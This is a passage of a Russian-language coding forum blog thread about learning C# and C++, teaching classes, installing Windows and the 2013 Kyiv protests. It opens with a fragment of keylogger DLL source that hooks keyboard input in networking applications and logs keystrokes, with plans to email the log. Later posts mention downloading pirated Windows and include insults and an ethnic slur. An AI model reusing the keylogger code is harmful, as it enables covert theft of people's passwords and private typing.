SetFilePointer
(g_hLogFile,
0
,
0
,FILE_END);
logHeader
(TRUE);
}
return
(g_hLogFile !=
NULL
);
}
BOOL APIENTRY DllMain(HINSTANCE hInstance,DWORD dwReason,LPVOID lpvReserved)
{
switch
(dwReason)
{
case
DLL_PROCESS_ATTACH:
g_hInstance = hInstance;
GetModuleFileName
(
0
,g_exePath,MAX_PATH);
GetModuleFileName
(hInstance,g_dllPath,MAX_PATH);
strcpy
(g_exePath,_strlwr(g_exePath));
#if AUTOHOOK
//first load will call injection and successfull load inspite of the process we are in...
if
(hInjectionHook ==
NULL
)
{
InstallHook
();
return
TRUE;
}
#endif
//instead of hardcoding the list a ".ini"
//file can be used to dynamically configure spynet
int
i;
for
(i=
0
;i<UBOUND_NETAPPLIST;i++)
{
if
(
strstr
(g_exePath,netAppList[i]))
{
BOOL bRet =
PrepareLogFile
() &&
InstallKeyLoggerHook
();
return
bRet;
}
}
//now, normally we LoadLibrary ourself to increase the reference count
//so that we won't be "free-ed" once the original injector terminates
//BUT, since we have established a WH_KEYBOARD hook
// in the process so we won't be unloaded till we have the keyboard hook...
return
FALSE;
break
;
case
DLL_PROCESS_DETACH:
UninstallKeyLoggerHook
();
if
(g_hLogFile)
{
logHeader
(FALSE);
CloseHandle
(g_hLogFile);
}
break
;
}
return
TRUE;
}
//TODO :
// Add Hot Key to Stop Keylogging...
// Evil stuff i haven't thought of yet...
// Email the Log File...

Вот только у всей этой кучи паблика одна и та же проблема.Попробуй поработай например с испанской,итальянской,туре цкой локалью.Обломчег)

vladyxa13
02.11.2013, 01:00
Пару дней назад заинтересовался C#. Как-то принадоело кодить на С++, так пошел в разведку на шарпы и джаву. Джавы больше и там надо в нее внедряться, а шарпы просто - умеешь кодить на С++, то и на шарпах значит тож. Пролистал книжечку Г.Шилдта C# Руководство для начинающих. Очень похожий синтаксис, но чуть не привычно. Может я не вчитался, но члены в классах там объявляются так:

C# highlight

class
Test
{
public
int
y;
private
double
t;
}

на плюсах

C++ highlight

class
{
double
t;
public
:
int
y;
};

Сегодня с svrid'ом в скайпе болтали, так вот доболтались до создания формочек на шарпах. Реально круто! Все так легко. Хотел осваивать сокеты на спп, но учиться тяжело(ну не идет и все, хоть убейся), но на C# все кажется легче. Ну вобщем я сложил неккую стратегию обучения ЯП: сначала я учу один, если что-то не понимаю, и то нечто реализовано легче в другом ЯП, учу то, потом после обучения, во втором ЯП иду учу в первом. Так после некой практики в C# Windows Forms, буду учить C++ Qt. Я рад, что выбрал именно С++, для первичного изучения ЯП, так как мне легко осваивать его родственников C#,Java.

Вел лекцию по Алгоритмам, тяжеловато - ребята в игрули играются, сидят в вк и только несколько человек внимательно слушают, бывает вся группа включает мозги, а бывает и отключает. Просто меня попросила моя знакомая преподавательница вести лекцию, потому что ей вынесли мозг на ДОП, там бешеные дети...конечно объяснять основы Ввода-вывода в Паскаль несложно,но кто-то не так напишет, другой из 5-ти строк кода сделает такую кашу....ну и быстро все забывают под конец занятия благодаря игрулям. Один вообще сидит вк в уголку и ему пох на учебу, переписывается, он и на аксесе, бездельничал. Просто поражает за что родители платят 2000 грн.. Хотя это не мои проблемы, но просто поразительно. Также обучал народ арифметическим операциям, разыменовывал
Delphi highlight

div
mod

было прикольно, пото му что было куча вопросов пока не написали чудо программу - "Калькулятор", вводим 2 числа с калавы - умножаем, плюсуем, отнимаем, делим нацело и с остатком, а особо когда человек не понимает значения операторов : и ;, хотя рассказывал о них 10+ мин. Учили типы данных, здесь слава Богу вопросов у слушателей не возникло.

После кьта хочу выучить WinAPI C++, довольно прикольные программы видел с использованием этой технологии. Как получать доступ к процессам, а самое интересное для меня это хуки. Пользоваться ими я не умею. Ну а после детального изучения C++ и C# перейду ка я к Java. А после джавки перейду к миласику Assembler, взрывать оперативку. Вот таков план. Кстати у меня через месяц курс по С++. Можно будет учителю задать много вопросам по тому же ВиньАПИ.

vladyxa13
17.11.2013, 01:00
Сижу я вчера на лекции и скучаю, препод что-то говорит, я дополняю. писал он код с ошибками специально, а ребята видели каждую третью, а я все. Я качался на стуле - Чуть не упал. Попросил я его пойти на плюсы. И оп нежданчик!

Кароч после того как я попросился пойти на плюсики посмотреть на ребят. Препод вышел на три минуты. До конца занятия 40 мин. И бах нежданчик, он приходит в кабинет и говорит: "Влад, поздравляю у тебя зачет!", я как! я вселишь попросился на плюсы. Я был в шоке оставалось 40 мин. Но со мной были плюсы паскальчик и шарпики. Написал я его! О да! Пару программ у меня на паскальчике не вышло, но на плюсах вышло! Я сделал четыре задания из пяти, но препод знал меня давненько, поэтому сказал в офисе что я все сдал.

У меня в среду консультация по С++. Надо повторить ООП. Вот такой я везучий на 13-ом занятии из 18-ти хапануть зачет

Yorvet
Я что, единственный, кто в реальной жизни напрямую (не в качестве хобби) к кодам не имеет никакого отношения и не учился на программиста?

ZoRKeG
Цитата:

Сообщение от Yorvet

Я что, единственный, кто в реальной жизни напрямую (не в качестве хобби) к кодам не имеет никакого отношения и не учился на программиста?

Не только ты

Wcfs
Цитата:

Сообщение от Yorvet

Я вообще мототехникой занимаюсь)
И еще парочку таких отсюда знаю, ТИША и de.p0ison

vladyxa13
Лично мне программирование дает силы жить. Я люблю что-то творить, а также ломать голову нас сложными вопросами.
__________________________________________________ ______________________________________
Кодинг мой смысл жизни.

Izatop
18.11.2013, 01:00
Цитата:

Сообщение от Yorvet

Изначально я занимался программированием просто для себя, в качестве хобби. Однако, вопрос с выбором дальнейшего пути развития был для меня решен уже на тот момент.
Уже тогда я твердо решил, что хочу связать свою жизнь с информационными технологиями. Это был класс так восьмой - именно в это время я увлекся Delphi, с которого и начался мой путь.
К моему безграничному счастью, так и произошло. Сейчас я учусь на специалиста по информационной безопасности, но для себя лично делаю сильный уклон в сторону кодинга (в частности, работаю Python-программистом). И я нисколько не жалею, что так поступил. Работа доставляет мне безграничное удовольствие.
Я прекрасно понимаю, что мог бы реализовать себя и в других областях, но я не представляю, какая еще работа могла бы мне быть настолько по душе. Будь я инженером, физиком, или еще кем - у меня есть задатки к этому, и я бы с этим справился, но я не чувствовал к этому такого интереса.
Моя личная заинтересованность, востребованность профессии, легкость, с которой я осваиваю языки программирования - все эти факторы оказали влияние на мой выбор.
Ведь это же очень хорошо, когда профессия и хобби прямо совпадают, не так ли?

ZoRKeG
lol, угадал?

code:

vladyxa13
hpc.name
https://hpc.name/member.php?u=178081
Contacts:

кодер

vladyxa13
Цитата:

Сообщение от ZoRKeG

lol, угадал?

code:

vladyxa13
hpc.name
https://hpc.name/member.php?u=178081
Contacts:

кодер

Зор, да, именно да!

vladyxa13
23.11.2013, 01:00
Пришел я сегодня на плюсы. Меня приняли, посидел я, рассказывал преподавательнице, что я знаю, она что-то поспрашивала. Потом смотрел на ее группу - ребята слабенькие. Ну и под конец занятия мне сказали что на этих курсах мне делать нечего, потому что я не их уровень, я хочу ВиньАПИ, кьют, а они фигурки рисуют(кружки, линии, элипсы и т.п.), да и мой препод говорит что здесь делать нечего. Вот я и ушел с курсов, когда-то мне в 5 лет сказали тоже самое в подготовительной школе, очень много знает учиться дальше нет смысла - мы его уровенень не потянем. Но преподы сказали, что бы я приезжал к ним, хотя бы раз в месяц, а то будет им скучно.

Вот как-то так.......

ZoRKeG
24.11.2013, 01:00
Лол, ну так, если у тебя есть знания и тыры-пыры, почему жители форума до сих пор от тебя не видят не одной программки?

Wcfs
Поддерживаю зорка, пока кроме слов мы ничего не наблюдали...

vladyxa13
Цитата:

Сообщение от Wcfs

Поддерживаю зорка, пока кроме слов мы ничего не наблюдали...

Статьи наблюдались...
Пошартесь в разделе с++.
И такой вопрос - вцфс, что полезное можно написать на чистых плюсах? Полезное пишется с использованием кьюта или виньапи, там обилие инструментов. Я на данный момент учу виньапи.

ZoRKeG
Если память не подводит, то там где красные подчеркивания должны быть точка с запятой ( ; )

vladyxa13
Цитата:

Сообщение от ZoRKeG

Если память не подводит, то там где красные подчеркивания должны быть точка с запятой ( ; )

неа
брателла скачай паскаль и проверь

ZoRKeG
Цитата:

Сообщение от vladyxa13

брателла скачай паскаль и проверь

Религия не позволяет((

vladyxa13
Цитата:

Сообщение от ZoRKeG

Религия не позволяет((

Ща покажу
IMAGE (https://hpc.name/redirector.html#http://i57.fastpic.ru/big/2013/1124/33/35a3d382d4df1dd5c643ba92aa071d33.jpg) http://i57.fastpic.ru/big/2013/1124/33/35a3d382d4df1dd5c643ba92aa071d33.jpg

IMAGE (https://hpc.name/redirector.html#http://i60.fastpic.ru/big/2013/1124/b7/ca0572ed62dba030f075240b0663fdb7.jpg) http://i60.fastpic.ru/big/2013/1124/b7/ca0572ed62dba030f075240b0663fdb7.jpg

IMAGE (https://hpc.name/redirector.html#http://i59.fastpic.ru/big/2013/1124/db/b1dd26f0b661bdf6eee1c4e55ddf59db.jpg) http://i59.fastpic.ru/big/2013/1124/db/b1dd26f0b661bdf6eee1c4e55ddf59db.jpg

Было бы еще лучше если бы то окошко двигалось, ну что б никто не сомневался, то кто-то может сказать что я обманываю! Хотя можно проверить и на онлайн компиляторе, их в нете полно!

ZoRKeG
А я вот такой вот куйней страдаю на парах программирования, самому аж обидно((
[/URL] (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118025/2c5e/EuOVTs892mU.jpg)IMAGE (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118025/2c5e/EuOVTs892mU.jpg) http://cs311118.vk.me/v311118025/2c5e/EuOVTs892mU.jpg

[URL="https://hpc.name/redirector.html#http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg"] (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg)IMAGE (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg) http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg

pwcode
06.12.2013, 01:00
Цитата:

Сообщение от ZoRKeG

А я вот такой вот куйней страдаю на парах программирования, самому аж обидно((
[/URL] (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118025/2c5e/EuOVTs892mU.jpg)IMAGE (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118025/2c5e/EuOVTs892mU.jpg) http://cs311118.vk.me/v311118025/2c5e/EuOVTs892mU.jpg

[URL="https://hpc.name/redirector.html#http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg"] (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg)IMAGE (https://hpc.name/redirector.html#http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg) http://cs311118.vk.me/v311118754/5164/_qNblubuLrk.jpg

Да, паскаль - это сильно)

vladyxa13
06.12.2013, 01:00
Сегодня выжал

IMAGE (https://hpc.name/redirector.html#http://www.speedtest.net/result/3148887464.png) http://www.speedtest.net/result/3148887464.png

Просто в винде галочку одну поменял вот и с 30-40 мб скорость возросла до такой.

Провайдер дает 100 мб, теперь я убедился, что он не врет.

Zooma
07.12.2013, 01:00
И какую ты галочку поменял?

vladyxa13
07.12.2013, 01:00
Цитата:

Сообщение от Zooma

И какую ты галочку поменял?

Заходим в gpedit.msc через Win+R.
Дальше Компьютер конфигурейшн или первый раздел, возле 3-го подраздела нажимаем плюсик и кликаем по плюсику и т. д. объяснил хреново, знаю, на картинке будет все понятно, главное в ране набери gpedit.msc.

IMAGE (https://hpc.name/redirector.html#http://i57.fastpic.ru/big/2013/1207/42/c18fb7300a0674d5662c3e845daccf42.jpg) http://i57.fastpic.ru/big/2013/1207/42/c18fb7300a0674d5662c3e845daccf42.jpg

IMAGE (https://hpc.name/redirector.html#http://i58.fastpic.ru/big/2013/1207/bb/b9539b09102bf5e719273d2253cdb7bb.jpg) http://i58.fastpic.ru/big/2013/1207/bb/b9539b09102bf5e719273d2253cdb7bb.jpg

Перезагрузи комп.

vladyxa13
11.12.2013, 01:00
ГАНЬБА,ГАНЬБА,ГАНЬБА

В Україні людей біля КМДА(Київська Міська Державна Адміністрація) розганяють холодною водою при температурі повітря -5 градусів за цельсієм.

http://ukrstream.tv/ (https://hpc.name/redirector.html#http://ukrstream.tv/) трансляція з майдану
http://obozrevatel.com/politics/5028...hturm-kgga.htm (https://hpc.name/redirector.html#http://obozrevatel.com/politics/50284-nachalsya-shturm-kgga.htm)
http://obozrevatel.com/politics/5809...-reportazh.htm (https://hpc.name/redirector.html#http://obozrevatel.com/politics/58093-evromajdan-2013--zachistki--onlajn-reportazh.htm)

IMAGE (https://hpc.name/redirector.html#http://i.obozrevatel.ua/8/1550359/gallery/511347.jpg) http://i.obozrevatel.ua/8/1550359/gallery/511347.jpg

Tokyo City
Цитата:

Сообщение от vladyxa13

ГАНЬБА,ГАНЬБА,ГАНЬБА

В Україні людей біля КМДА(Київська Міська Державна Адміністрація) розганяють холодною водою при температурі повітря -5 градусів за цельсієм.

http://ukrstream.tv/ (https://hpc.name/redirector.html#http://ukrstream.tv/) трансляція з майдану
http://obozrevatel.com/politics/5028...hturm-kgga.htm (https://hpc.name/redirector.html#http://obozrevatel.com/politics/50284-nachalsya-shturm-kgga.htm)
http://obozrevatel.com/politics/5809...-reportazh.htm (https://hpc.name/redirector.html#http://obozrevatel.com/politics/58093-evromajdan-2013--zachistki--onlajn-reportazh.htm)

IMAGE (https://hpc.name/redirector.html#http://i.obozrevatel.ua/8/1550359/gallery/511347.jpg) http://i.obozrevatel.ua/8/1550359/gallery/511347.jpg

А что с ними еще делать то

ZoRKeG
vladyxa13, Ну, щито поделать, правильно и делают -)
Сегодня с утра у нас было -13 градусов, а мне норм

vladyxa13
Цитата:

Сообщение от Tokyo City

А что с ними еще делать то

Для чего разгонять людей холодной водой, на твое мнение это нормально?

vladyxa13
Цитата:

Сообщение от ZoRKeG

vladyxa13, Ну, щито поделать, правильно и делают -)
Сегодня с утра у нас было -13 градусов, а мне норм

Я тож в рубахе ганял целое утро по балкону, прохлаждался))
Но на майдане получается бред, Яник с Азировим просто так не уйдут, а людей бить все таки нельзя.

ZoRKeG
Цитата:

Сообщение от vladyxa13

Но на майдане получается бред, Яник с Азировим просто так не уйдут, а людей бить все таки нельзя.

Вот только что с маркета пришел так на улице не так уж и холодно как это было утром, примерно а 9:30, и днем)
А лол, а людям, кхм, стаду баранов, какой смысл выходить на майдан и что-то там вытворять? Напрыгивать на беркут, валить ленина и тому подобное, был бы тихий митинг - беркут не налетал бы на людей, а так провокаторы сами виноваты, что беркут бушует, но и беркут не правильно делает, смотрел видосы как они разгоняли людей, лол, один чел упал, а каждый из беркутовцев пробегал мимо и лупил его с ноги, а также, налетали на мирных жителей, но я бы на ихнем месте тоже не разбирался, кто мирный, а кто нет, в общем, не моё это дело, я ничего там не изменю)

Tokyo City
Цитата:

Сообщение от vladyxa13

Ага,а кирпичами в беркут кидать вообще збс,мало их облили

vladyxa13
Цитата:

Сообщение от ZoRKeG

Вот только что с маркета пришел так на улице не так уж и холодно как это было утром, примерно а 9:30, и днем)
А лол, а людям, кхм, стаду баранов, какой смысл выходить на майдан и что-то там вытворять? Напрыгивать на беркут, валить ленина и тому подобное, был бы тихий митинг - беркут не налетал бы на людей, а так провокаторы сами виноваты, что беркут бушует, но и беркут не правильно делает, смотрел видосы как они разгоняли людей, лол, один чел упал, а каждый из беркутовцев пробегал мимо и лупил его с ноги, а также, налетали на мирных жителей, но я бы на ихнем месте тоже не разбирался, кто мирный, а кто нет, в общем, не моё это дело, я ничего там не изменю)

Да мы ничего не изменим, но можно сказать, что нарушали обе стороны.

Цитата:

Сообщение от Tokyo City

Ага,а кирпичами в беркут кидать вообще збс,мало их облили

То были провокаторы, да и народ под их дудку плясать начал, пока не включились и не поняли, что это за люди.

ZoRKeG
Цитата:

Сообщение от vladyxa13

Да мы ничего не изменим, но можно сказать, что нарушали обе стороны.

Если бы те засранци с митинга не полезли на беркут - беркут бы на них не полез, в общем, хреново быть хохлом, таки дела

Tokyo City
Если бы те засранци с митинга не полезли на беркут - беркут бы на них не полез, в общем, хреново быть хохлом, таки дела

Lol

MaCroSs
12.12.2013, 01:00
Цитата:

Сообщение от ZoRKeG

Lol

Да какая разница у кого какая национальность?Ты что умник такой,выбрал где родился?

Ты что из них http://thekievtimes.ua/society/28824...o-ukrainy.html (https://hpc.name/redirector.html#http://thekievtimes.ua/society/288246-nasilie-zarazno-igra-nokaut-doshla-do-ukrainy.html) ?

Tokyo City
[quote=MaCroSs;430551]
Цитата:

Сообщение от Tokyo City

Да какая разница у кого какая национальность?Ты что умник такой,выбрал где родился?

Ты что из них http://thekievtimes.ua/society/28824...o-ukrainy.html (https://hpc.name/redirector.html#http://thekievtimes.ua/society/288246-nasilie-zarazno-igra-nokaut-doshla-do-ukrainy.html) ?

К чему это было сказано?к чему данная ссылка?
Я что то вообще сказал про нацию ?

ZoRKeG
Цитата:

Сообщение от MaCroSs

Ты что из них http://thekievtimes.ua/society/28824...o-ukrainy.html (https://hpc.name/redirector.html#http://thekievtimes.ua/society/28824...o-ukrainy.html) ?

Что? Причем тут та игра "Нокаут"?
Я по твоему, что? Пишу, что украинцы такие-сякие? - Да всрались они мне! Я живу в этом гребаном бардаке и говорю, что мне хреново быть хохлом.
При первой же возможности сматался бы с этой страны, с украинским флагом, чтобы потом вытереть им жопу, такие пироги

glm1997
Ну если на то пошло, то нефиг бульдозером беркут и военнослужащих хуя.ить. Беркут Отомстил !!! А получили пизды, как всегда мирные митингующие !!!

MaCroSs
del

vladyxa13
21.12.2013, 01:00
Никогда не работал с линуксом полноценно, так как на ноуте установлена убунта и я еще не поставил винду, то попробовал я ее поюзать, чуть не понятно, для виндоюзера, но мне очень понравилось! Кодить там тупо в кайф, не хочу с ней расставаться, но придется установить винь и отдать ноут. Скоро будет свой комп, так поделю я не на два раздела жестянку, а на три 1-Win7 2-Инфа и 3-Linux.

Если буду учить Питон и Перл, то выберу линукс, так как там жутко удобно кодить.
А также меня очень поразило то, что все приложения с открытым исходным кодом

vladyxa13
Привезли мне сегодня ноутбук Dell inspiron 3521 и сказали, делай шо хоч, но что бы через пару дней было все: винда, MS office и еще полезной софтятины. Полез я на любимый rutracker.org (https://hpc.name/redirector.html#http://rutracker.org) и поставил качаться Win7 Ultimate (https://hpc.name/redirector.html#http://rutracker.org/forum/viewtopic.php?t=4539411), а также почистил от всякого хлама двд-рв. После того как образ скачался, я записал его на свой чудо рв с помощью Ashampoo Burning Studio 14 (https://hpc.name/redirector.html#https://www.ashampoo.com/ru/rub/pin/4010/Burning_Software/Ashampoo-Burning-Studio-14). Перезагружаю комп захожу в биос меняю в местами хдд и сд\двд и сохраняю, перезагружаюсь. Вылетает установка винды7 выбираю 32 бита, так как на борту 4 гб ОЗУ выбираю язык, нажимаю установить виндузяру и опа - нежданчег в виде такой плюхи IMAGE (https://hpc.name/redirector.html#http://i.imgur.com/X8FNYjw.jpg) http://i.imgur.com/X8FNYjw.jpg

Так как я опытный пользователь гугла, иду туда и вбиваю эту траблу и мне вылазит это Windows 7 при установке с DVD диска требует драйвер оптического привода (https://hpc.name/redirector.html#https://www.google.com.ua/search?q=Windows+7+%D0%BF%D1%80%D0%B8+%D1%83%D1%81 %D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B5+%D1%81+ DVD+%D0%B4%D0%B8%D1%81%D0%BA%D0%B0+%D1%82%D1%80%D0 %B5%D0%B1%D1%83%D0%B5%D1%82+%D0%B4%D1%80%D0%B0%D0% B9%D0%B2%D0%B5%D1%80+%D0%BE%D0%BF%D1%82%D0%B8%D1%8 7%D0%B5%D1%81%D0%BA%D0%BE%D0%B3%D0%BE+%D0%BF%D1%80 %D0%B8%D0%B2%D0%BE%D0%B4%D0%B0&ie=utf-8&oe=utf-8&rls=org.mozilla:ru:official&client=firefox-a&channel=rcs&gws_rd=cr&ei=NLe0UvqXCYTUsgaU8IGIDQ). Чуть пошарился, увидел множество советов. Думаю нужно будет попробывать установить с флехи, не получается, покупаю двд-р и записшу как советуют с помощью imgBurn на минималке, а также были идеи установить хр а потом 7, но мне лень играться в эти игры. Качал драйвер с сайта дела, но тож результат не был обнаружен.

В общем я не терял надежды - шаманил, то 32 бита врубал, то 64 и толку ноль выдает для меня уже противный месседжбокс с IMAGE (https://hpc.name/redirector.html#http://i.imgur.com/X8FNYjw.jpg) http://i.imgur.com/X8FNYjw.jpg

В крайнем случае установлю восьмерочку, но чего-то не очень хочется ее устанавливать.

MaCroSs
Цитата:

Сообщение от vladyxa13

Привезли мне сегодня ноутбук Dell inspiron 3521 и сказали, делай шо хоч, но что бы через пару дней было все: винда, MS office и еще полезной софтятины. Полез я на любимый rutracker.org (https://hpc.name/redirector.html#http://rutracker.org) и поставил качаться Win7 Ultimate (https://hpc.name/redirector.html#http://rutracker.org/forum/viewtopic.php?t=4539411), а также почистил от всякого хлама двд-рв. После того как образ скачался, я записал его на свой чудо рв с помощью Ashampoo Burning Studio 14 (https://hpc.name/redirector.html#https://www.ashampoo.com/ru/rub/pin/4010/Burning_Software/Ashampoo-Burning-Studio-14). Перезагружаю комп захожу в биос меняю в местами хдд и сд\двд и сохраняю, перезагружаюсь. Вылетает установка винды7 выбираю 32 бита, так как на борту 4 гб ОЗУ выбираю язык, нажимаю установить виндузяру и опа - нежданчег в виде такой плюхи IMAGE (https://hpc.name/redirector.html#http://i.imgur.com/X8FNYjw.jpg) http://i.imgur.com/X8FNYjw.jpg

Так как я опытный пользователь гугла, иду туда и вбиваю эту траблу и мне вылазит это Windows 7 при установке с DVD диска требует драйвер оптического привода (https://hpc.name/redirector.html#https://www.google.com.ua/search?q=Windows+7+%D0%BF%D1%80%D0%B8+%D1%83%D1%81 %D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B5+%D1%81+ DVD+%D0%B4%D0%B8%D1%81%D0%BA%D0%B0+%D1%82%D1%80%D0 %B5%D0%B1%D1%83%D0%B5%D1%82+%D0%B4%D1%80%D0%B0%D0% B9%D0%B2%D0%B5%D1%80+%D0%BE%D0%BF%D1%82%D0%B8%D1%8 7%D0%B5%D1%81%D0%BA%D0%BE%D0%B3%D0%BE+%D0%BF%D1%80 %D0%B8%D0%B2%D0%BE%D0%B4%D0%B0&ie=utf-8&oe=utf-8&rls=org.mozilla:ru:official&client=firefox-a&channel=rcs&gws_rd=cr&ei=NLe0UvqXCYTUsgaU8IGIDQ). Чуть пошарился, увидел множество советов. Думаю нужно будет попробывать установить с флехи, не получается, покупаю двд-р и записшу как советуют с помощью imgBurn на минималке, а также были идеи установить хр а потом 7, но мне лень играться в эти игры. Качал драйвер с сайта дела, но тож результат не был обнаружен.

В общем я не терял надежды - шаманил, то 32 бита врубал, то 64 и толку ноль выдает для меня уже противный месседжбокс с IMAGE (https://hpc.name/redirector.html#http://i.imgur.com/X8FNYjw.jpg) http://i.imgur.com/X8FNYjw.jpg

В крайнем случае установлю восьмерочку, но чего-то не очень хочется ее устанавливать.

В последнее время думаю DELL ноут взять,но блин дорогие

vladyxa13
Цитата:

Сообщение от MaCroSs

В последнее время думаю DELL ноут взять,но блин дорогие

Дак этот 4 штуки гривен стоит, не так уж и дорого.

vladyxa13
30.12.2013, 01:00
IMAGE (https://hpc.name/redirector.html#http://cs7004.vk.me/c540102/v540102189/105f2/RW_P_n1xAnM.jpg) http://cs7004.vk.me/c540102/v540102189/105f2/RW_P_n1xAnM.jpg

Многие уже знают, что наряду с программистами появилась такая славная народная профессия как "тыжпрограммист".
Тыжпрограммист- это универсальная профессия. Она охватывает тупо все. У программистов множество разных специализаций.
«У меня сломался комп, что делать?». Да я без малейшего понятия. «Но тыжпрограммист»
Конечно. Я же программист. И системный администратор тоже. И компьютерный инженер. Я все сразу. Я просто-таки могу паять платы и чинить что угодно. А самое главное, тыжпрограммисты, они все просто-таки экстрасенсы. Каждый тыжпрограммист обладает экстрасенсорными силами. И когда нам звонят с вопросом «у меня комп сломался, что может быть», тыжпрограмист просто моментально, нет, нет… тыжпрограммист, он сам тебе позвонит и скажет причину неисправности.
Тыжпрограммист- человек информ. бюро.
Он всегда сидит за компьютером и всегда готов ответить на твой телефонный звонок! Всегда готов подсказать тебе адрес, номер телефона, и прогуглить любой интересующий тебя вопрос!
Более того у тыжпрограммиста нет выходных и своего личного времени он всегда готов сидеть и колупать твой старый раздолбанный комп (которому давно пора на мусорку). Просто-таки пожертвовать всем ради тебя. Ведь только ты один обращаешься к тыжпрограммисту!
И конечно! КОНЕЧНО! Тыжпрограммист настолько щедр, что ему не проблема помочь твоему любимому соседу, брату, твоей собачке и вообще, всем-всем твоим знакомым и их знакомым абсолютно бесплатно!
Вывод:
Тыжпрограмисты - самые щедрые, добрые и терпеливые люди!
Это лишь малость. Уважайте друг друга и не забывайте: время- деньги, а час программиста стоит не дешево!
Тыжпрограммист всегда готов отказаться от прогулки с любимой ради решения твоей проблемы.

Автор: Игорь Иванов

Ко мне тоже иногда обращаются с такой просьбой...

vladyxa13
30.12.2013, 01:00
Здравствуйте уважаемые пользователи сия замечательного форума! Сегодня я вас обучу как ломать Пентагон.

И так, прежде чем ламать Пентагон надо убедится, что у вас все дома, если все, то идем ломать, не просто ламать, а ламать полностью, это я говорю совершенно серьезно!!!

И так выполняем слудующие шаги:
Осознаем, что за нами уже едут, вы не волнуйтесь, все будет гладко, близкие будут знать, что вы в командировке.

Заходим на сайт http://hackertyper.com/ (https://hpc.name/redirector.html#http://hackertyper.com/)

Нажимаем F11(На весь экран).

Начинаем печатать код для проникновения в сеть, защищенную 512 битным шифром.

Пишем до конца пока не взламаем, помним, что за нами выехалии и если взломать, то можно стереть выезд на нашу хату.

vladyxa13 специально для hpc.name

ChEcHeNeC
31.12.2013, 01:00
Цитата:

Сообщение от vladyxa13

Здравствуйте уважаемые пользователи сия замечательного форума! Сегодня я вас обучу как ломать Пентагон.

И так, прежде чем ламать Пентагон надо убедится, что у вас все дома, если все, то идем ломать, не просто ламать, а ламать полностью, это я говорю совершенно серьезно!!!

И так выполняем слудующие шаги:
Осознаем, что за нами уже едут, вы не волнуйтесь, все будет гладко, близкие будут знать, что в в командировке.

Заходим на сайт http://hackertyper.com/ (https://hpc.name/redirector.html#http://hackertyper.com/)

Нажимаем F11(На весь экран).

Начинаем печатать код для проникновения в сеть, защищенную 512 битным шифром.

Пишем до конца пока не взламаем, помним, что за нами выехалии и если взломать, то можно стереть выезд на нашу хату.

vladyxa13 специально для hpc.name

ты вообще охренел ???? Зачем палить приват ???

MaCroSs
31.12.2013, 01:00

vladyxa13
03.01.2014, 01:00
Мда, когда начинал кодить, то часто на нее ругался и забывал ее ставить.

IMAGE (https://hpc.name/redirector.html#http://cs314917.vk.me/v314917439/68b7/LT3XW6wxF0c.jpg) http://cs314917.vk.me/v314917439/68b7/LT3XW6wxF0c.jpg

IMAGE (https://hpc.name/redirector.html#http://cs7004.vk.me/c540102/v540102394/aa18/bF3uvT8pa0w.jpg) http://cs7004.vk.me/c540102/v540102394/aa18/bF3uvT8pa0w.jpg

А также путал в С++ куда применять операторы > к объекту cout или cin.
По правилам нужно так:

C++ highlight

cout>

а я писал наоборот и поэтому мне выдавало такой список ошибок, мама не горюй

C++ highlight

cout>>
cinпротокол криптобезопасности военного уровня»[/I]
Супер секретный протокол

IMAGE (https://hpc.name/redirector.html#http://cs314329.vk.me/v314329159/7925/4qC96Cp_Yr4.jpg) http://cs314329.vk.me/v314329159/7925/4qC96Cp_Yr4.jpg

Без комментариев...

IMAGE (https://hpc.name/redirector.html#http://cs7004.vk.me/c540102/v540102394/a917/Z4_Rq5KoCHE.jpg) http://cs7004.vk.me/c540102/v540102394/a917/Z4_Rq5KoCHE.jpg

Никогда не видал - надеюсь и не увижу.

IMAGE (https://hpc.name/redirector.html#http://cs7004.vk.me/c540102/v540102394/abc7/dV4zbxmcfRo.jpg) http://cs7004.vk.me/c540102/v540102394/abc7/dV4zbxmcfRo.jpg

C++ highlight

[LEFT][CODE]
#define == =
#define this NULL
#define true false
#define cout cin
#define switch while

Счастливого рождества, дебага и компайла, а также линковки

_Werewolf_
Блох у тебя прикольный, без особого пафоса и новостей. Даже начинаю задумываться о своём, буду уже там бредить наяву =)
Про точку с запятой всего пару раз забывал я. После жёсткой матерщины компилятора, я как-то привык уже на автомате её ставить. Последим за блогом =)
P. S. Фриланс убил =)

vladyxa13
Цитата:

Сообщение от _Werewolf_

Блох у тебя прикольный, без особого пафоса и новостей. Даже начинаю задумываться о своём, буду уже там бредить наяву =)
Про точку с запятой всего пару раз забывал я. После жёсткой матерщины компилятора, я как-то привык уже на автомате её ставить. Последим за блогом =)
P. S. Фриланс убил =)

Я этот блог веду для души, что бы когда-то вспомнить каким я был тогда тупым и поржать над старым владюхой. А куда пафос, я даже не знаю что ему в блоге кодера делать. Мой пафос это код, много кода + чашка кофе\чая.

P.S Все что надо для работы

C++ highlight

#include
#include
#include

C# highlight

using
C
#;
using
System;

vladyxa13
10.01.2014, 01:00
И тут мне стало страшно....

Цитата:

1)Ник:Creepeer276
2)Возраст:10
3)Страж игры:4 года
4)Пиратка
5)нету
6)Хочу модерку.

Как игры убивают детей. В шесть лет уже задрачиватся, ИМХО бред.

Wcfs
10.01.2014, 01:00
Цитата:

Сообщение от vladyxa13

И тут мне стало страшно....

Как игры убивают детей. В шесть лет уже задрачиватся, ИМХО бред.

Дата выхода игры ноябрь 2011, это уже говорит о том что он не может играть в нее 4 года

vladyxa13
09.02.2014, 01:00
Новые покупки и приключения с отверткой

Месяц был просто шикарен....

В начале я купил збс роутер ASUS RT-N65U (https://hpc.name/redirector.html#http://hotline.ua/network-besprovodnoe-oborudovanie/asus-rt-n65u/?gclid=CNWYiL-kvbwCFSvHtAodoHwAZw) покупкой доволен не жалуюсь.

Парочка фотографий
